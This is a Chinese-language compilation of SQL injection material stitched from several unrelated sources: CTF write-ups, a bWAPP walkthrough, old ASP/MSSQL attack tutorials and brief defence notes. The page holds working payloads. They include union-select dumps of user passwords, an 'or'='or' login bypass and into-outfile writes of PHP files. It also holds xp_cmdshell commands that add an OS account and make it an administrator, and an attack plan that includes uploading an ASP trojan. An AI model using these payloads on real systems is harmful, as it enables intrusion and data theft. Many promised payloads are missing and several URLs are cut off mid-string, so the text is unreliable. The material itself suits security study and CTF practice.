sql注入select

『壹』 部分sql注入總結

本人ctf選手一名，在最近做練習時遇到了一些sql注入的題目，但是sql注入一直是我的弱項之一，所以寫一篇總結記錄一下最近學到的一些sql注入漏洞的利用。

在可以聯合查詢的題目中，一般會將資料庫查詢的數據回顯到首頁面中，這是聯合注入的前提。

適用於有回顯同時資料庫軟體版本是5.0以上的MYSQL資料庫,因為MYSQL會有一個系統資料庫information_schema， information_schema 用於存儲資料庫元數據(關於數據的數據)，例如資料庫名、表名、列的數據類型、訪問許可權等

聯合注入的過程：

判斷注入點可以用and 1=1/and 1=2用於判斷注入點

當注入類型為數字型時返回頁面會不同,但都能正常執行。

sql注入通常為數字型注入和字元型注入：

1、數字型注入

數字型語句：

在這種情況下直接使用and 1=1/and 1=2是都可以正常執行的但是返回的界面是不一樣的

2、字元型注入

字元型語句：

字元型語句輸入我們的輸入會被一對單引號或這雙引號閉合起來。

所以如果我們同樣輸入and 1=1/and 1=2會發現回顯畫面是並無不同的。

在我們傳入and 1=1/and 1=2時語句變為

傳入的東西變成了字元串並不會被當做命令。

所以字元型的測試方法最簡單的就是加上單引號 ' ，出現報錯。

加上注釋符--後正常回顯界面。

這里還有的點就是sql語句的閉合也是有時候不同的，下面是一些常見的

這一步可以用到order by函數，order by 函數是對MySQL中查詢結果按照指定欄位名進行排序，除了指定字 段名還可以指定欄位的欄位進行排序，第一個查詢欄位為1，第二個為2，依次類推，所以可以利用order by就可以判斷列數。

以字元型注入為例：

在列數存在時會正常回顯

但是列數不存在時就會報錯

這步就說明了為什麼是聯合注入了，用到了UNION，UNION的作用是將兩個select查詢結果合並

但是程序在展示數據的時候通常只會取結果集的第一行數據，這就讓聯合注入有了利用的點。

當我們查詢的第一行是不存在的時候就會回顯第二行給我們。

講查詢的數據置為-1，那第一行的數據為空，第二行自然就變為了第一行

在這個基礎上進行注入

可以發現2，3都為可以利用的顯示點。

和前面一樣利用union select，加上group_concat()一次性顯示。

現在非常多的Web程序沒有正常的錯誤回顯，這樣就需要我們利用報錯注入的方式來進行SQL注入了

報錯注入的利用步驟和聯合注入一致，只是利用函數不同。

以updatexml為例。

UpdateXML(xml_target, xpath_expr, new_xml)

xml_target： 需要操作的xml片段

xpath_expr： 需要更新的xml路徑(Xpath格式)

new_xml： 更新後的內容

此函數用來更新選定XML片段的內容，將XML標記的給定片段的單個部分替換為 xml_target 新的XML片段 new_xml ，然後返回更改的XML。xml_target替換的部分 與xpath_expr 用戶提供的XPath表達式匹配。

這個函數當xpath路徑錯誤時就會報錯，而且會將路徑內容返回，這就能在報錯內容中看到我們想要的內容。

而且以~開頭的內容不是xml格式的語法，那就可以用concat函數拼接~使其報錯，當然只要是不符合格式的都可以使其報錯。

[極客大挑戰 2019]HardSQL

登錄界面嘗試注入，測試後發現是單引號字元型注入，且對union和空格進行了過濾，不能用到聯合注入，但是有錯誤信息回顯，說明可以使用報錯注入。

利用updatexml函數的報錯原理進行注入在路徑處利用concat函數拼接~和我們的注入語句

發現xpath錯誤並執行sql語句將錯誤返回。

在進行爆表這一步發現了等號也被過濾，但是可以用到like代替等號。

爆欄位

爆數據

這里就出現了問題flag是不完整的，因為updatexml能查詢字元串的最大長度為32，所以這里要用到left函數和right函數進行讀取

報錯注入有很多函數可以用不止updatexml一種，以下三種也是常用函數：

堆疊注入就是多條語句一同執行。

原理就是mysql_multi_query() 支持多條sql語句同時執行，用;分隔，成堆的執行sql語句。

比如

在許可權足夠的情況下甚至可以對資料庫進行增刪改查。但是堆疊注入的限制是很大的。但是與union聯合執行不同的是它可以同時執行無數條語句而且是任何sql語句。而union執行的語句是有限的。

[強網杯 2019]隨便注

判斷完注入類型後嘗試聯合注入，發現select被過濾，且正則不區分大小寫過濾。

那麼就用堆疊注入，使用show就可以不用select了。

接下去獲取表信息和欄位信息

那一串數字十分可疑大概率flag就在裡面，查看一下

這里的表名要加上反單引號，是資料庫的引用符。

發現flag，但是沒辦法直接讀取。再讀取words，發現裡面有個id欄位，猜測資料庫語句為

結合1'or 1=1#可以讀取全部數據可以利用改名的方法把修改1919810931114514為words，flag修改為id，就可以把flag讀取了。

最終payload：

盲注需要掌握的幾個函數

在網頁屏蔽了錯誤信息時就只能通過網頁返回True或者False判斷，本質上是一種暴力破解，這就是布爾盲注的利用點。

首先，判斷注入點和注入類型是一樣的。

但是盲注沒有判斷列數這一步和判斷顯示位這兩步，這是和可回顯注入的不同。

判斷完注入類型後就要判斷資料庫的長度，這里就用到了length函數。

以[WUSTCTF2020]顏值成績查詢為例

輸入參數後，發現url處有個get傳入的stunum

然後用到length函數測試是否有注入點。

發現頁面有明顯變化

將傳入變為

頁面回顯此學生不存在

那麼就可以得出資料庫名長度為3

測試發現過濾了空格

然後就是要查資料庫名了，這里有兩種方法

一、只用substr函數，直接對比

這種方法在寫腳本時可以用於直接遍歷。

二、加上ascii函數

這個payload在寫腳本時直接遍歷同樣可以，也可用於二分法查找，二分法速度更快。

接下來的步驟就和聯合注入一樣，只不過使用substr函數一個一個截取字元逐個判斷。但是這種盲注手工一個一個注十分麻煩所以要用到腳本。

直接遍歷腳本

二分法腳本

時間盲注用於代碼存在sql注入漏洞，然而頁面既不會回顯數據，也不會回顯錯誤信息

語句執行後也不提示真假，我們不能通過頁面的內容來判斷

所以有布爾盲注就必有時間盲注，但有時間盲注不一定有布爾盲注

時間盲注主要是利用sleep函數讓網頁的響應時間不同從而實現注入。

sql-lab-less8：

無論輸入什麼都只會回顯一個you are in...，這就是時間盲注的特點。

當正常輸入?id=1時時間為11毫秒

判斷為單引號字元型注入後，插入sleep語句

明顯發現響應時間為3053毫秒。

利用時間的不同就可以利用腳本跑出資料庫，後續步驟和布爾盲注一致。

爆庫

爆表

爆欄位

腳本

在進行SQL注入時,發現union,and,or被完全過濾掉了,就可以考慮使用異或注入

什麼是異或呢

異或是一種邏輯運算，運演算法則簡言之就是：兩個條件相同（同真或同假）即為假（0），兩個條件不同即為真（1），null與任何條件做異或運算都為null，如果從數學的角度理解就是，空集與任何集合的交集都為空

即 1^1=0,0^0=0,1^0=1

利用這個原理可以在union，and，or都被過濾的情況下實現注入

[極客大挑戰 2019]FinalSQL

給了五個選項但是都沒什麼用，在點擊後都會在url處出現?id。

而且union，and，or都被過濾

測試發現?id=1^1會報錯

但是?id=1^0會返回?id=1的頁面，這就是前面說的原理，當1^0時是等於1的所以返回?id=1的頁面。

根據原理寫出payload，進而寫出腳本。

爆庫

爆表

爆欄位

據此可以寫出基於異或的布爾盲注腳本

實驗推薦：課程:SQL注入初級(合天網安實驗室)

『貳』 SQL注入步驟和常用函數以及中文處理方法

第一節 SQL注入的一般步驟 首先 判斷環境 尋找注入點 判斷資料庫類型 這在入門篇已經講過了 其次 根據注入參數類型 在腦海中重構SQL語句的原貌 按參數類型主要分為下面三種 (A)ID= 這類注入的參數是數字型 SQL語句原貌大致如下 Select * from 表名 where 欄位= 注入的參數為ID= And [查詢條件] 即是生成語句 Select * from 表名 where 欄位= And [查詢條件](B) Class=連續劇 這類注入的參數是字元型 SQL語句原貌大致概如下 Select * from 表名 where 欄位= 連續劇 注入的參數為Class=連續劇 and [查詢條件] and = 即是生成語句 Select * from 表名 where 欄位= 連續劇 and [查詢條件] and = (C) 搜索時沒過濾參數的 如keyword=關鍵字 SQL語句原貌大致如下 Select * from 表名 where 欄位like %關鍵字% 注入的參數為keyword= and [查詢條件] and % = 即是生成語句 Select * from 表名 where欄位like % and [查詢條件] and % = % 接著 將查詢條件替換成SQL語句 猜解表名 例如 ID= And (Select Count(*) from Admin)>= 如果頁面就與ID= 的相同 說明附加條件成立 即表Admin存在 反之 即不存在（請牢記這種方法） 如此循環 直至猜到表名為止 表名猜出來後 將Count(*)替換成Count(欄位名) 用同樣的原理猜解欄位名 有人會說 這里有一些偶然的成分 如果表名起得很復雜沒規律的 那根本就沒得玩下去了 說得很對 這世界根本就不存在 %成功的黑客技術 蒼蠅不叮無縫的蛋 無論多技術多高深的黑客 都是因為別人的程序寫得不嚴密或使用者保密意識不夠 才有得下手 有點跑題了 話說回來 對於SQLServer的庫 還是有辦法讓程序告訴我們表名及欄位名的 我們在高級篇中會做介紹 最後 在表名和列名猜解成功後 再使用SQL語句 得出欄位的值 下面介紹一種最常用的方法－Ascii逐字解碼法 雖然這種方法速度很慢 但肯定是可行的方法 我們舉個例子 已知表Admin中存在username欄位 首先 我們取第一條記錄 測試長度 ?id= and (select top len(username) from Admin)> 先說明原理 如果top 的username長度大於 則條件成立 接著就是> > > 這樣測試下去 一直到條件不成立為止 比如> 成立 > 不成立 就是len(username)= 當然沒人會笨得從 一個個測試 怎麼樣才比較快就看各自發揮了 在得到username的長度後 用mid(username N )截取第N位字元 再asc(mid(username N ))得到ASCII碼 比如 id= and (select top asc(mid(username )) from Admin)> 同樣也是用逐步縮小范圍的方法得到第 位字元的ASCII碼 注意的是英文和數字的ASCII碼在 之間 可以用折半法加速猜解 如果寫成程序測試 效率會有極大的提高 第二節 SQL注入常用函數 有SQL語言基礎的人 在SQL注入的時候成功率比不熟悉的人高很多 我們有必要提高一下自己的SQL水平 特別是一些常用的函數及命令 Access asc(字元)SQLServer unicode(字元)作用 返回某字元的ASCII碼Access chr(數字)SQLServer nchar(數字)作用 與asc相反 根據ASCII碼返回字元Access mid(字元串 N L)SQLServer substring(字元串 N L)作用 返回字元串從N個字元起長度為L的子字元串 即N到N+L之間的字元串Access abc(數字)SQLServer abc (數字)作用 返回數字的絕對值（在猜解漢字的時候會用到）Access A beeen B And CSQLServer A beeen B And C作用 判斷A是否界於B與C之間 第三節 中文處理方法 在注入中碰到中文字元是常有的事 有些人一碰到中文字元就想打退堂鼓了 其實只要對中文的編碼有所了解 中文恐懼症 很快可以克服 先說一點常識 Access中 中文的ASCII碼可能會出現負數 取出該負數後用abs()取絕對值 漢字字元不變 SQLServer中 中文的ASCII為正數 但由於是UNICODE的雙位編碼 不能用函數ascii()取得ASCII碼 必須用函數unicode ()返回unicode值 再用nchar函數取得對應的中文字元 了解了上面的兩點後 是不是覺得中文猜解其實也跟英文差不多呢？除了使用的函數要注意 猜解范圍大一點外 方法是沒什麼兩樣的 lishixin/Article/program/SQLServer/201311/22039

『叄』 SQL注入之GET型（select）

0x01：測試分析

我們進行測試這里是否存在SQL注入漏洞

輸入'

點擊go後

報錯了，說明很大可能存在SQL注入漏洞了。

0x02：爆欄位（欄位就是這個數據表中的列）

-1 order by 1#

-1 order by 2#

........

-1 order by 7#

-1 order by 8#

所以可以判斷出來，一共有7個列。

0x03：爆資料庫名

-1 union select 1,database(),user(),4,5,6,7 #

當前資料庫名為bwapp

0x04：爆表（即獲取當前資料庫有哪些表）

-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() #

經判斷，當前查詢方式有限制 limit 0,1

可以通過group_concat() 查詢

當前資料庫有，五張表，分別是

blog,heroes,movies,users,visitors

0x05：獲取後台賬戶用戶名和密碼

-- 查users表的列名

-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='users'#

users表中有9列，分別是

id,login,password,email,secret,activation_code,activated,reset_code,admin

-- 查login和password的內容

-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from users#

獲得兩個賬戶 A.I.M.和 bee

密碼需要先解密

md5解密地址：cmd5.com

『肆』 通過代碼限制輸入select，能防止sql注入了有繞過方法嗎

直接把符號的編碼轉換或者轉義可以了。一般sql注入根本用不到select，譬如賬號密碼你默認就是在where條件上進行查詢，如果人家or 1=1則默認真。另外也能通過UNION 返回的錯誤判斷返回值的數量和類型。如果沒限制 換行+GO 的話甚至能執行自己想要的SQL。但是這些最終都需要一個符號例如單引號"'"吧系統誤以為輸入框的內容已階段。如果轉義或者轉編碼後，最多就變成一段長字元而已

『伍』 什麼叫sql注入，如何防止sql注入

sql注入其實就是在這些不安全控制項內輸入sql或其他資料庫的一些語句，從而達到欺騙伺服器執行惡意到嗎影響到資料庫的數據。防止sql注入，可以在接受不安全空間的內容時過濾掉接受字元串內的「'」，那麼他不再是一條sql語句，而是一個類似sql語句的zifuc，執行後也不會對資料庫有破壞。
如：下面這一段是找的
username = request("username") //獲取用戶名 這里是通過URL傳值獲取的
password = request("password") //獲取密碼 也是通過URL傳值獲取的
sql="select * from userlist where username = '" & username & "' and password = '" & password & "'"--------如果某個人知道某個用戶名是admin,常常有人網站的管理員用戶名就是admin,這是密碼可以選用'or 1 or ',
那麼sql="select * from userlist where username = 'admin' and password = '' or 1 or ''"，顯然1是恆真的，那麼驗證密碼就通過了。補充：
防止的方式比較多，比如可以限制username,password中出現"'"這些字元，一般網站都是只允許數字，字元，下劃線的組合，這可以通過javascript驗證。也可以採取用存儲過程代替sql拼接，等等。

『陸』 什麼是SQL注入

SQL注入是一種非常常見的資料庫攻擊手段，SQL注入漏洞也是網路世界中最普遍的漏洞之一。大家也許都聽過某某學長通過攻擊學校資料庫修改自己成績的事情，這些學長們一般用的就是SQL注入方法。

SQL注入其實就是惡意用戶通過在表單中填寫包含SQL關鍵字的數據來使資料庫執行非常規代碼的過程。簡單來說，就是數據「越俎代庖」做了代碼才能乾的事情。

這個問題的來源是，SQL資料庫的操作是通過SQL語句來執行的，而無論是執行代碼還是數據項都必須寫在SQL語句之中，這就導致如果我們在數據項中加入了某些SQL語句關鍵字（比如說SELECT、DROP等等），這些關鍵字就很可能在資料庫寫入或讀取數據時得到執行。

二、SQL注入的產生需要滿足以下兩個條件
1、參數用戶可控：前端傳給後端的參數用戶可控。2、參數帶入資料庫查詢：傳入的參數拼接到SQL語句中，且帶入資料庫中查詢。

1、按照注入點分類：

（1）數字型注入：許多網頁鏈接有類似的結構 http://xxx.com/users.php?id=1 基於此種形式的注入，注入點id為數字，一般被叫做數字型注入點，通過這種形式查詢出後台資料庫信息返回前台展示，可以構造類似以下的SQL語句進行爆破：select *** from 表名 where id=1 and 1=1。
2）字元型注入：網頁鏈接有類似的結構

http://xxx.com/users.php?name=admin 這種形式，注入點name為字元串，被稱為字元型注入，可以用：select *** from 表名 where name='admin' and 1=1。

3）搜索型注入：主要是指在數據搜索時沒有過濾搜索參數，一般在鏈接地址中有 "keyword=「關鍵字」"，注入點提交的是SQL語句，select * from 表名 where 欄位 like '%關鍵字%' and '%1%'='%1%'。

『柒』 sql注入的注入方法

先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count（列名） from 表名）<>0
或者也可以這樣
and exists (select * from 表名）
and exists (select 列名 from 表名）
返回正確的，那麼寫的表名或列名就是正確
這里要注意的是，exists這個不能應用於猜內容上，例如and exists (select len(user) from admin)>3 這樣是不行的
很多人都是喜歡查詢裡面的內容，一旦iis沒有關閉錯誤提示的，那麼就可以利用報錯方法輕松獲得庫裡面的內容
獲得資料庫連接用戶名：；and user>0
這個是小竹提出來的，我這里引用《SQL注入天書》裡面的一段話來講解：
重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar轉換int異常，XXXX不能轉換成int
看到這里大家明白了吧，報錯的原理就是利用SQLserver內置的系統表進行轉換查詢，轉換過程會出錯，然後就會顯示出在網頁上，另外還有類似的and 1=(selet top 1 user from admin），這種語句也是可以爆出來的。；and db_name()>0 則是暴資料庫名。
一旦關閉了IIS報錯，那麼還可以用union（聯合查詢）來查內容，主要語句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查欄位數目，admin就是表名，可以自己猜，user,passwd是列名
反正就是返回正確即對，返回異常即錯
另外還有十分常用的ASCII碼拆半法
先要知道指定列名，例如user里的內容的長度
and (select len(user) from admin)=2 就是查詢長度為不為2位，返回錯誤的增加或減少數字，一般這個數字不會太大，太大的就要放棄了，猜也多餘
後面的邏輯符號可以根據不同要求更改的，
>；大於 <；小於 =就是等於咯，更新語句的話，=也可以表示傳遞符號 <>；就是不等
知道了長度後就可以開始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)>100
n就是猜解的表名的第幾位，最後的長度數字就是剛才猜解出來的列名長度了，And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里內容的第一位的ASCII字元是不是大於100
正確的話，那麼表示USER第一個字元的ASCII碼大於100，那麼就猜>120，返回錯誤就是介於100－120之間，然後再一步一步的縮少，最終得到正確字元XXX，然後用ASCII轉換器吧這個轉換成普通字元就可以了
然後就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去
加在url後面，列名表名還是先猜解，返回正確的代表帳號的ASCII碼大於100，那麼就再向前猜，直到報錯，把猜出來的ASCII碼拿去ASCII轉換器轉換就可以了，中文是負數，加上asb取絕對值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320
得到之後就記得在數字前加-號，不然ASCII轉換器轉換不來的，中文在ASCII碼里是-23423這樣的，所以猜起來挺麻煩
這個猜解速度比較慢，但是效果最好，最具有廣泛性 後台身份驗證繞過漏洞
驗證繞過漏洞就是'or'='or'後台繞過漏洞，利用的就是AND和OR的運算規則，從而造成後台腳本邏輯性錯誤
例如管理員的賬號密碼都是admin，那麼再比如後台的資料庫查詢語句是
user=request(user)
passwd=request(passwd)
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那麼我使用'or 'a'='a來做用戶名密碼的話，那麼查詢就變成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
這樣的話，根據運算規則，這里一共有4個查詢語句，那麼查詢結果就是 假or真and假or真，先算and 再算or，最終結果為真，這樣就可以進到後台了
這種漏洞存在必須要有2個條件，第一個：在後台驗證代碼上，賬號密碼的查詢是要同一條查詢語句，也就是類似
sql=select * from admin where username='&username&'&passwd='&passwd&'
如果一旦賬號密碼是分開查詢的，先查帳號，再查密碼，這樣的話就沒有辦法了。
第二就是要看密碼加不加密，一旦被MD5加密或者其他加密方式加密的，那就要看第一種條件有沒有可以，沒有達到第一種條件的話，那就沒有戲了 防禦方法
對於怎麼防禦SQL注入呢，這個網上很多，我這里講幾個
如果自己編寫防注代碼，一般是先定義一個函數，再在裡面寫入要過濾的關鍵詞，如select ; 「」；from；等，這些關鍵詞都是查詢語句最常用的詞語，一旦過濾了，那麼用戶自己構造提交的數據就不會完整地參與資料庫的操作。
當然如果你的網站提交的數據全部都是數字的，可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 傳入參數 ---
'ParaName：參數名稱-字元型
'ParaType：參數類型-數字型（1表示以上參數是數字，0表示以上參數為字元）
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write 參數 & ParaName & 必須為數字型！
Response.end
End if
Else
ParaValue=replace(ParaValue,','')
End if
SafeRequest=ParaValue
End function
然後就用SafeRequest（）來過濾參數 ，檢查參數是否為數字，不是數字的就不能通過。 SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析，構造巧妙的SQL語句，從而成功獲取想要的數據，是高手與「菜鳥」的根本區別。

『捌』 SQL注入之outfile

找到注入點後利用語句：select [column...] from [table_name] into outfile [path]導出數據信息。此信息可以被sql注入利用。

找出對象伺服器系統，找出apache的根目錄，利用上面語句，將一個文件放到根目錄中，隨後可以在頁面中訪問該文件。文件名後綴可以自定義。

有時候導入導出許可權會被mysql限制，只能將文件導入或導出到指定位置：

ERROR 1290: The MySQL server is running with the __secure-file-priv option so it cannot execute this statement

這時可以使用語句:show variables like 'secure_file_priv'來查詢能導入導出的位置

找到位置後就在對應位置導入或者導出文件：

select * from users into outfile '/var/lib/mysql-files/aa'

這時我們可以導出一個php文件，比如

select '<?php phpinfo() ?>' into outfile '/var/lib/mysql-files/test.php';phpinfo是導出php伺服器環境的配置信息

然後，我們再去/var/lib/mysql-files目錄下查看是否真的導出成功了。

『玖』 SQL注入是怎麼回事

SQL注入攻擊是黑客對資料庫進行攻擊的常用手段之一。隨著B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也越來越多。但是由於程序員的水平及經驗也參差不齊，相當大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。SQL注入是從正常的WWW埠訪問，而且表面看起來跟一般的Web頁面訪問沒什麼區別，所以目前市面的防火牆都不會對SQL注入發出警報，如果管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。但是，SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況，需要構造巧妙的SQL語句，從而成功獲取想要的數據。

SQL注入攻擊的總體思路

·發現SQL注入位置；
·判斷後台資料庫類型；
·確定XP_CMDSHELL可執行情況
·發現WEB虛擬目錄
·上傳ASP木馬；
·得到管理員許可權；

SQL注入攻擊的步驟
一、SQL注入漏洞的判斷

一般來說，SQL注入一般存在於形如：http://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的ASP動態網頁中，有時一個動態網頁中可能只有一個參數，有時可能有N個參數，有時是整型參數，有時是字元串型參數，不能一概而論。總之只要是帶有參數的動態網頁且此網頁訪問了資料庫，那麼就有可能存在SQL注入。如果ASP程序員沒有安全意識，不進行必要的字元過濾，存在SQL注入的可能性就非常大。

為了全面了解動態網頁回答的信息，首選請調整IE的配置。把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://xxx.xxx.xxx/abc.asp?p=YY為例進行分析，YY可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數YY為整型時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位=YY，所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』，abc.asp運行異常；
②http://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常，而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③http://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。

2、字元串型參數的判斷

當輸入的參數YY為字元串時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位='YY'，所以可以用以下步驟測試SQL注入是否存在。
①http://xxx.xxx.xxx/abc.asp?p=YY』(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY』，abc.asp運行異常；
②http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='1', abc.asp運行正常，而且與http://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... 39;1'='2', abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；
②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；
③ASCII碼法：可以把輸入的部分或全部字元全部用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附件二；

二、分析資料庫伺服器類型

一般來說，ACCESS與SQL－SERVER是最常用的資料庫伺服器，盡管它們都支持T－SQL標准，但還有不同之處，而且不同的資料庫有不同的攻擊方法，必須要區別對待。

1、 利用資料庫伺服器的系統變數進行區分
SQL－SERVER有user,db_name()等系統變數，利用這些系統值不僅可以判斷SQL-SERVER，而且還可以得到大量有用信息。如：
① http://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前連接到資料庫的用戶名
②http://xxx.xxx.xxx/abc.asp?p=YY&;n ... db_name()>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前正在使用的資料庫名；

2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權，而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句：
①http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②http://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若資料庫是SQL-SERVE，則第一條，abc.asp一定運行正常，第二條則異常；若是ACCESS則兩條都會異常。

3、 MSSQL三個關鍵系統表
sysdatabases系統表：Microsoft SQL Server 上的每個資料庫在表中佔一行。最初安裝 SQL Server 時，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 資料庫的項。該表只存儲在 master 資料庫中。 這個表保存在master資料庫中，這個表中保存的是什麼信息呢？這個非常重要。他是 保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID，dbid從1到5是系統的。分別是：master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。

Sysobjects：SQL-SERVER的每個資料庫內都有此系統表，它存放該資料庫內創建的所有對象，如約束、默認值、日誌、規則、存儲過程等，每個對象在表中佔一行。

syscolumns：每個表和視圖中的每列在表中佔一行，存儲過程中的每個參數在表中也佔一行。該表位於每個資料庫中。主要欄位有：
name ，id， colid ：分別是欄位名稱，表ID號，欄位ID號，其中的 ID 是 剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中，表的ID是123456789中的所有欄位列表。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、http://xxx.xxx.xxx/abc.asp?p=YY&;nb ... er>0 abc.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。
2、http://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連接的資料庫名。
3、http://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主資料庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、http://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加的帳戶aaa加到administrators組中。
5、http://xxx.xxx.xxx/abc.asp?p=YY；backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
http://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

『拾』 如何防範SQL注入漏洞及檢測

以下是OMG我為大家收集整理的文章，希望對大家有所幫助。

SQL注入(SQLInjection)漏洞攻擊是目前網上最流行最熱門的黑客腳本攻擊方法之一，那什麼是SQL注入漏洞攻擊呢?它是指黑客利用一些Web應用程序(如：網站、論壇、留言本、文章發布系統等)中某些存在不安全代碼或SQL語句不縝密的頁面，精心構造SQL語句，把非法的SQL語句指令轉譯到系統實際SQL語句中並執行它，以獲取用戶名、口令等敏感信息，從而達到控制主機伺服器的攻擊方法。

1. SQL注入漏洞攻擊原理

1. 1 SQL注入漏洞攻擊實現原理

SQL(Structured Query Language)是一種用來和資料庫交互的語言文本。SQL注入的攻擊原理就是攻擊者通過Web應用程序利用SQL語句或字元串將非法的數據插入到伺服器端資料庫中，獲取資料庫的管理用戶許可權，然後將資料庫管理用戶許可權提升至操作系統管理用戶許可權，控制伺服器操作系統，獲取重要信息及機密文件。

SQL注入漏洞攻擊主要是通過藉助於HDSI、NBSI和Domain等SQL注入漏洞掃描工具掃描出Web頁面中存在的SQL注入漏洞，從而定位SQL注入點，通過執行非法的SQL語句或字元串達到入侵者想要的操作。下面以一段身份驗證的.NET代碼為例，說明一下SQL 注入攻擊的實現方法。

SqlConnectionnwConn = new SqlConnection((string)ConfigurationSettings.AppSettings["DBconnStrings"]); string queryStr = "SELECT userid,userpwd, username,type FROM users where userid='" + Txtusername.Text +"'";

DataSet userSet = new DataSet();

SqlDataAdapter userAdapter = newSqlDataAdapter(queryStr, nwConn);

userAdapter.Fill(userSet, "Users");

Session["UserID"] =Txtusername.Text.ToString();

Session["type"] =type.Text.ToString();

Response.Redirect("/Myweb/admin/login.aspx");

從上面的代碼中可以看出,程序在與資料庫建立連接得到用戶數據之後,直接將username的值通過session傳給login.aspx，沒有進行任何的過濾和處理措施, 直接用來構造SQL 語句, 其危險系數是非常高的, 攻擊者只要根據SQL 語句的編寫規則就可以繞過身份驗證，從而達到入侵的目的。

1. 2 SQL注入漏洞攻擊分析

SQL注入可以說是一種漏洞，也可以說是一種攻擊。當程序中的變數處理不當，沒有對用戶提交的數據類型進行校驗，編寫不安全的代碼，構造非法的SQL語句或字元串，都可能產生這個漏洞。

